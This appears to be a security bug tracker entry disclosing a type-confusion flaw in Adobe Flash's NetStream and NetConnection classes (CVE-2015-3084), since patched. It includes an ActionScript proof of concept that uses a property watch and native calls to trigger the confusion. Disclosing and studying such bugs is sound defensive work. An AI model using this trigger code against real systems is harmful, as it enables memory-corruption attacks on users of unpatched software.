Status: Fixed
Closed: May 2015
Adobe Flash: NetStream Missing Constructor Normal Check
Project Member Reported by natashenka@google.com, Mar 14 2015
The NetStream class does not check that the new object is a normal object before setting its user data and destroy function. This allows for type confusion in several places, including the NetConnection class as shown in the code below:

import flash.display.BitmapData;
import flash.net.FileReference;

class mysubclass extends NetConnection {

    function mysubclass(a) {
        this.uri = "test";
        super();
        this.watch("uri", func);
        var n = {toString : func};
        var s = super;
        var y;
        trace(y);
        this.connect(y);
        var f = ASnative(2101, 411); // setBufferTimeMax
        f.call(this, 1000);

        function func(a, b, c) {
            trace("here " + b + " " + c);
            var f = ASnative(2101, 200); // newStream
            var o = {};
            var n = new NetConnection();
            var y;
            n.connect(y);
            f(this, n);
            return c;
        }
    }
}

The NetConnection connect function checks that the this object is a NetConnection, but then sets the URI before it sets the user data and destroyproc. Setting a watch on the URL allows a call into ActionScript, and then the object type can be set using the NetStream constructor before returning to the NetConnection. This leads to an object with type NetStream backed by a native object of type NetConnection.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Attachments: super2.swf (1.0 KB), super2.fla (5.4 KB), mysubclass.as (1.1 KB)
Comment 1 by cevans@google.com, Mar 17 2015
Labels: Id-3496
Comment 2 by cevans@google.com, May 7 2015
Labels: CVE-2015-3084
Comment 3 by cevans@google.com, May 12 2015
Labels: Fixed-2015-May-12
Status: Fixed
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html
Project Member Comment 4 by natashenka@google.com, May 28 2015
Labels: -Restrict-View-Commit